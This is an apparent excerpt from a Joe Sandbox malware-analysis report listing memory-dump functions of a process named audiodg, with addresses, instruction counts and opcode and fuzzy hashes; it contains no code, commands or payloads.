                                  • Opcode Fuzzy Hash: 52c6eb457864e09ce4f56dcb244ba0ae2692fadb0f466f2d199af9d3586c47c5
                                  • Instruction Fuzzy Hash: 0F11EE3094E78E4FD71A9BA4987A5B97FB0EF06300F0641EBC059CB0E3CA696655CB11
                                  Function 00007FFD9BAB4665 Relevance: .1, Instructions: 67COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec287c6852bd55b26d1fc0a7c3690d349f2e137fe949f517b73bf8d86ef8ef76
                                  • Instruction ID: 87727c9730d8cb67aa52c5d5fe0dc5999ee583e7cd3ad8da95a98aa1f8c71875
                                  • Opcode Fuzzy Hash: ec287c6852bd55b26d1fc0a7c3690d349f2e137fe949f517b73bf8d86ef8ef76
                                  • Instruction Fuzzy Hash: 8011A230A0965E8FEB98EF68C4692B97BE1FF28300F0105BED42DC21A2DE75A1408B40
                                  Function 00007FFD9BAB6CB5 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6bcd235a7af22439a5f69f18c66d58fa85289ff0d6c4c362ac29a604921c148
                                  • Instruction ID: 3dc4ea3e5f6dc3104b9a8df1236ee2a222440b0a3f92602ed4f7c15d4fa6aef7
                                  • Opcode Fuzzy Hash: c6bcd235a7af22439a5f69f18c66d58fa85289ff0d6c4c362ac29a604921c148
                                  • Instruction Fuzzy Hash: 9F11B730A09A4E8FDB98EF68C4652B97BE1FF58301F01057ED42DC71A2DA75A544CB40
                                  Function 00007FFD9BAAF8DF Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAF000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaf000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a03fa0d7a7dda3b3c7b5ef71ab800b42af244eeeac4de476f76d19028115e662
                                  • Instruction ID: a9df63b34a82d8bad9172c7a78f7892ba0dae9d3b584fb5940c75b8c3782469e
                                  • Opcode Fuzzy Hash: a03fa0d7a7dda3b3c7b5ef71ab800b42af244eeeac4de476f76d19028115e662
                                  • Instruction Fuzzy Hash: 1E215EB1E0961E9EDBA8DF2888653A8B3A1FF58310F0101FED11DD3292DF741A818F11
                                  Function 00007FFD9BAB45C9 Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4130af84ac635caf1d45a850c9177f49d90e3e635f6695edb3aa2c9f7eccc644
                                  • Instruction ID: d5839e20def5f192326544f1a01c3e994d320d683fe548c2df4f117059a2f8cc
                                  • Opcode Fuzzy Hash: 4130af84ac635caf1d45a850c9177f49d90e3e635f6695edb3aa2c9f7eccc644
                                  • Instruction Fuzzy Hash: 7E218130A0E68E8FEB99EFA884652B97BA1FF19301F0505BED429C61A2DE756540CB41
                                  Function 00007FFD9BAB2321 Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b586d524f8467b208e32653f34366a505290ee3b3c32f627d21371ae097a352e
                                  • Instruction ID: 23ad394436b1ec332127a16af06abfb1d746d6b14f53d8112f1ba5a273e561eb
                                  • Opcode Fuzzy Hash: b586d524f8467b208e32653f34366a505290ee3b3c32f627d21371ae097a352e
                                  • Instruction Fuzzy Hash: C211BB31A0934E8FCB58DF68C4A51E97FE1FF58304F02066EE81AC32A1CB74A650CB80
                                  Function 00007FFD9BAB4B05 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 467dff929fe433edd43c072bd7a2cf053fd7beaacd6437258fbad1e916d44e88
                                  • Instruction ID: 653b423501ad7863d492af6d10516d67dc6a298c04c72300a3e766fb5fb69b95
                                  • Opcode Fuzzy Hash: 467dff929fe433edd43c072bd7a2cf053fd7beaacd6437258fbad1e916d44e88
                                  • Instruction Fuzzy Hash: 4C11C471A0EA8D4BEBA9DFA488752B87BA0EF19304F0504BED16DC65F3DE656540CB01
                                  Function 00007FFD9BAB4F0D Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61468a8809ff1e4c26ea59169be345615ee9d23e445466bb4bb750852b0df32a
                                  • Instruction ID: 67c29cc30b246cb9ef6fc1beed54957a215417b62d3fb9bbee6d39ba58be032b
                                  • Opcode Fuzzy Hash: 61468a8809ff1e4c26ea59169be345615ee9d23e445466bb4bb750852b0df32a
                                  • Instruction Fuzzy Hash: 0C11E231E0995E4FEB90EBA888585FD7BE1FF59300F4245BAD028C71B6EE74A6448B00
                                  Function 00007FFD9BAB4E79 Relevance: .1, Instructions: 60COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4fae0440f4bc7351905c44dc1ff3946edcc2893bdb5e58ae8562a001c3114b69
                                  • Instruction ID: 279a1f3d391789a4393879623ff1130b8c9140747eab59fae5b20ad6cee82d65
                                  • Opcode Fuzzy Hash: 4fae0440f4bc7351905c44dc1ff3946edcc2893bdb5e58ae8562a001c3114b69
                                  • Instruction Fuzzy Hash: 69118130A0A68E4FEB95EFA488696F97BF0FF19300F0505BED429C61B2DE756640CB01
                                  Function 00007FFD9BAA117D Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 636e273497c3ec565defce30625c429e3f51a47aaedbde7c49824519b899e0fc
                                  • Instruction ID: f559a728991f312b91b9eacb09eba35560d50e28e92566d770b161fc5183d84f
                                  • Opcode Fuzzy Hash: 636e273497c3ec565defce30625c429e3f51a47aaedbde7c49824519b899e0fc
                                  • Instruction Fuzzy Hash: 5F11E630A0E64E5EEBA99B6484682B97BE1EF66304F01047FD01DC60E2EA686640C710
                                  Function 00007FFD9BAB2F45 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61c035469fe1789d9164a55276bae82eaead58386135cf89f614ad8a3d2c3631
                                  • Instruction ID: fb10c4096a39da64b75dafddc1eb0374642857aa8795679539a4417ae6669b68
                                  • Opcode Fuzzy Hash: 61c035469fe1789d9164a55276bae82eaead58386135cf89f614ad8a3d2c3631
                                  • Instruction Fuzzy Hash: 8211E370A0A65E4FE7A0EBB488685B97FE0FF18300F4605B7D41CC70A2EA34A1548B01
                                  Function 00007FFD9BAB7321 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a9d44eda0ece73d0bf62ab208ed8de652a40f56a45d2768ce07018e7d7667214
                                  • Instruction ID: 52b937830dbb0ead5fbfccb930bb1cb7a6e2df72397a56b53ec7c7d9f92ac39a
                                  • Opcode Fuzzy Hash: a9d44eda0ece73d0bf62ab208ed8de652a40f56a45d2768ce07018e7d7667214
                                  • Instruction Fuzzy Hash: 1C11C431A0E55E8FE751EBB4C858AA97BF0FF19301F0509B6D828C70B1EAB4E640CB50
                                  Function 00007FFD9BAB2721 Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bdf74ba554d30a2f618a41576e759e0b7d3c98100c142aa1e0f890bf9c5ecc4
                                  • Instruction ID: 79a5b17c231e5581c35ddffd611d2d42dbb77993129c655c86d68be976854c99
                                  • Opcode Fuzzy Hash: 2bdf74ba554d30a2f618a41576e759e0b7d3c98100c142aa1e0f890bf9c5ecc4
                                  • Instruction Fuzzy Hash: 0611A131E0A65E4FE792EBA498585F97FE0FF19300F0549B6E468C7066EA74A2848F41
                                  Function 00007FFD9BAB5F19 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5681cbe883e3cc710544a8e6df87837107e5c0354f1c7b1b0fb6be4d9c94d88b
                                  • Instruction ID: eb6e55c206849eca732d98c44e9cc7876838877c1c0dfb130508af36128c8677
                                  • Opcode Fuzzy Hash: 5681cbe883e3cc710544a8e6df87837107e5c0354f1c7b1b0fb6be4d9c94d88b
                                  • Instruction Fuzzy Hash: 3711C430A0A64E4FE791EBB488695A9BBE0FF15300F0545B6D828C60A2EA74A1448B01
                                  Function 00007FFD9BAB4DED Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e87514ebf9aa472359dcf77bc29c0728030699676a0d86b2852a5ad3c8d2333
                                  • Instruction ID: e2008ade969aecac1abc00f2b55937094b05dbb9454f433b52c2b86736d24074
                                  • Opcode Fuzzy Hash: 5e87514ebf9aa472359dcf77bc29c0728030699676a0d86b2852a5ad3c8d2333
                                  • Instruction Fuzzy Hash: A2118F31A0964E4BEBA9EF6484696F977A1FF18304F0505BED42DC61B2DE6566408B01
                                  Function 00007FFD9BAB4C2D Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2974ce9d2fa60cca0f2112189fda8735402e2f5b3844e7c0e5b05b4cfb6f610
                                  • Instruction ID: 29a207cdfd00c09799314560c9c0e262ba6b3cf067f32c678cbfae7d6796503c
                                  • Opcode Fuzzy Hash: b2974ce9d2fa60cca0f2112189fda8735402e2f5b3844e7c0e5b05b4cfb6f610
                                  • Instruction Fuzzy Hash: F1119031A0A64E4FEB98EFA488696B97BA0FF19304F0105BED429C61B6DE7561408B01
                                  Function 00007FFD9BAA3535 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96d0703fd41c563b381cd603f2506ae93bc0b97501b489400452c330ac0f1100
                                  • Instruction ID: a4b128ee2e83dacd4956dda0513aa359e65a507f08b7eacb1ec548393bef8539
                                  • Opcode Fuzzy Hash: 96d0703fd41c563b381cd603f2506ae93bc0b97501b489400452c330ac0f1100
                                  • Instruction Fuzzy Hash: 2D115E70A1A68E8FDB98EFA8C4696BD7BE1FF18304F0108BED419C61A1DB75A6408750
                                  Function 00007FFD9BAA22A1 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b64dbb807d83e32b5cf3e3190fb7691ea50bfdb22ec031d364e896f7c10f60c4
                                  • Instruction ID: 07d778d1f0cab2425aa1bc98f2931398b98974e15262d8868f1f3214286f4b13
                                  • Opcode Fuzzy Hash: b64dbb807d83e32b5cf3e3190fb7691ea50bfdb22ec031d364e896f7c10f60c4
                                  • Instruction Fuzzy Hash: 0801B530A0E64E8FE761EBB485695A97BE1EF56300F4244B6D408C70B6EE74E694C721
                                  Function 00007FFD9BAA2F11 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb9856126aa0d4f2b00edb14898f84d7aff6614a130b675e16d91b3b6b55a8cd
                                  • Instruction ID: 254ccf96ec6af68a8273cdb7e6f11c4df61a795fb1210cbe7d4632594f5e898e
                                  • Opcode Fuzzy Hash: fb9856126aa0d4f2b00edb14898f84d7aff6614a130b675e16d91b3b6b55a8cd
                                  • Instruction Fuzzy Hash: 0D01D470E1A64E8FE761EBA485691AD7BE1EF19300F4649BAD40CC70B2EE74E2648711
                                  Function 00007FFD9BAA05D8 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b8939cfc7ebdcc1ea8363ec35de2e006455f0eef95e23f42ccc7f20cdb9ea8f
                                  • Instruction ID: b7f6b0071f43ab8bebbd919832f45e77e9ee77aef4b03ac2665a25b3f9dcadc2
                                  • Opcode Fuzzy Hash: 4b8939cfc7ebdcc1ea8363ec35de2e006455f0eef95e23f42ccc7f20cdb9ea8f
                                  • Instruction Fuzzy Hash: FC01B130A0950E9FDB98EF64C4656BA77E2FF6A304F11447ED41EC31A4CE75A650CB50
                                  Function 00007FFD9BAAADFA Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f67f560adb7267ba61556f536e18a4a5a36617730b05165d9b457d0f256c605
                                  • Instruction ID: 6517e1b23ad2e33000d1fa4caf650b9f26cc1b5c1c57c921b22cf61e3984111d
                                  • Opcode Fuzzy Hash: 1f67f560adb7267ba61556f536e18a4a5a36617730b05165d9b457d0f256c605
                                  • Instruction Fuzzy Hash: 6E01F571F0E95E4FE771EBA8C4681B97BD2EF18300F0644B6D45CC70B1EE24A5448361
                                  Function 00007FFD9BAA28ED Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f471654587411eb69a2c3f502899f23c74b4e3c31a86e7321dd9b2a8247fab67
                                  • Instruction ID: 5a1d0ded468a839368369a6b2bf7bf41c499a6ffa356a7c1748d7ca22256e858
                                  • Opcode Fuzzy Hash: f471654587411eb69a2c3f502899f23c74b4e3c31a86e7321dd9b2a8247fab67
                                  • Instruction Fuzzy Hash: 0F01DF30E0A74E4FE765EBA489A86B97BE1EF19300F0245B6D40CC70B2EA74E250C711
                                  Function 00007FFD9BAB7AED Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2d4e0aa9c49fa6062da8279c668b166a0f4cefc9297251fe81f107d0e115a20
                                  • Instruction ID: 466e5596bcaacc62e7df87fe591a097d0807c14d7911f9d7f25e4d197b225f89
                                  • Opcode Fuzzy Hash: a2d4e0aa9c49fa6062da8279c668b166a0f4cefc9297251fe81f107d0e115a20
                                  • Instruction Fuzzy Hash: 0F01D830A0A54D8FDB58EF64C4655B97BA0FF19304F0604BED02AC70E2DEB5AA50CF41
                                  Function 00007FFD9BAA2F89 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d62ed52d030de9e3cafcbb48bb9fb368129c75d4e6e3c14b442fb5a0e6eaac00
                                  • Instruction ID: 044a04f966ee4ed51559b54085b27d3579950efdba021c26a8e10f9569700efc
                                  • Opcode Fuzzy Hash: d62ed52d030de9e3cafcbb48bb9fb368129c75d4e6e3c14b442fb5a0e6eaac00
                                  • Instruction Fuzzy Hash: DB01D470A0E74D4FE762A7B489695A97FE1EF05300F0604F7C408CB0B6DA78A6688721
                                  Function 00007FFD9BAA0610 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72acef97e61bd5119aa94a7cbf2b4f42b4fc5bd21ee41ce64cc07b61f69d94d8
                                  • Instruction ID: 4051dac16efcd8605562102cc8285655c726e1cfcf9e6dc923fa521c6db7ed16
                                  • Opcode Fuzzy Hash: 72acef97e61bd5119aa94a7cbf2b4f42b4fc5bd21ee41ce64cc07b61f69d94d8
                                  • Instruction Fuzzy Hash: 13018630A19A0E8AEB59EBA4C5685BDB3E1FF1C305F11447EE41EC21E5DF79A650CB10
                                  Function 00007FFD9BAA0608 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1d77b56043e0ef440a4e4ea932a293efaef179ec1ed64593f944f01465955e9
                                  • Instruction ID: b81b6449b630484ea894df5c30b80e9328f728c0a7b9ca110f90adfba941b298
                                  • Opcode Fuzzy Hash: a1d77b56043e0ef440a4e4ea932a293efaef179ec1ed64593f944f01465955e9
                                  • Instruction Fuzzy Hash: 9F018630A1560E8BDB58EFA4C5695BDB3A1FF1C305F11487EE41EC21E5DF75A250CA10
                                  Function 00007FFD9BAA1CED Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4909d9388c88cd4d11198999c26afcba0238783320f6a56c3c177bf7d4c2a4d0
                                  • Instruction ID: 8a25d1ae772817d8d56c881f0ed0de7b9bd389ac2c1b07eb6f50d103d049b1ce
                                  • Opcode Fuzzy Hash: 4909d9388c88cd4d11198999c26afcba0238783320f6a56c3c177bf7d4c2a4d0
                                  • Instruction Fuzzy Hash: BE01F930A0A68D9FDB94DF54C4651F97BE1FF66304F41107EE81CC61A1DBB9A550CB40
                                  Function 00007FFD9BAA246A Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86af5199bfd8170abe2ec952c07bab18a431c5c6ffe5ee67f9ba4d3ce93eff22
                                  • Instruction ID: 02a508658aa6794c9555dbf1fdeac4582538ae19406ea98e3fbf1c565eeb1095
                                  • Opcode Fuzzy Hash: 86af5199bfd8170abe2ec952c07bab18a431c5c6ffe5ee67f9ba4d3ce93eff22
                                  • Instruction Fuzzy Hash: 2F01DB30A4A61ECBEBB4DB90C9647A873B6FB54700F1140B9C00ED21A1CEB82A84DB50
                                  Function 00007FFD9BAA05D0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52decf208e055678cf03df3029cc2377ede9324536688bea7d284169f98ae5d8
                                  • Instruction ID: e02c4bf09b18b0f7cb7fa33c738020a2b52e2425bff4fb26336fbefe0d183faf
                                  • Opcode Fuzzy Hash: 52decf208e055678cf03df3029cc2377ede9324536688bea7d284169f98ae5d8
                                  • Instruction Fuzzy Hash: A8F0FC30A0A54E9FDB94EF64C4255FA7791EF26309F11047AE81DC20D1CE75A550CB40
                                  Function 00007FFD9BAA1190 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a38dba289b7d912f64f1eae971a7ea91423e2a248dc85652e5d21c6e24d81a1e
                                  • Instruction ID: e2bdc6607a5d16c4a956ad1950d502c56b27f3dc4d1b452539a14e7eb0fe1e35
                                  • Opcode Fuzzy Hash: a38dba289b7d912f64f1eae971a7ea91423e2a248dc85652e5d21c6e24d81a1e
                                  • Instruction Fuzzy Hash: 6EF0C830E1E65F4AFBA49BA488682B976E5EF66305F00053FD41DC20E1EFB85654C650
                                  Function 00007FFD9BAA2809 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74e934142809d68143a4eb70f852de8a1adfc69995d0f63abd2d3702da09f5a5
                                  • Instruction ID: d08302a2638524281b6cb050cfe2c25146ee2249daaa0749d7b85bf06b5abb0e
                                  • Opcode Fuzzy Hash: 74e934142809d68143a4eb70f852de8a1adfc69995d0f63abd2d3702da09f5a5
                                  • Instruction Fuzzy Hash: 05F0C23190E38D8FDB699F7089651E97F60AF5A200F4604FAE408C60F2DAB89558C711
                                  Function 00007FFD9BAA287D Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 037f8bd347ce57f048b4ca0325ca8c7ef495bfcc92c36daa4060ca68bc32a433
                                  • Instruction ID: 2747e9f2e816f354a6ffb1684334afe5a4f484b28a875022fdb14e7e10a3e6a8
                                  • Opcode Fuzzy Hash: 037f8bd347ce57f048b4ca0325ca8c7ef495bfcc92c36daa4060ca68bc32a433
                                  • Instruction Fuzzy Hash: 55F02430A0E78E8FEB689FA084241F97BA0FF19300F4200BEF818C10E1DB78E5608700
                                  Function 00007FFD9BAA24AD Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
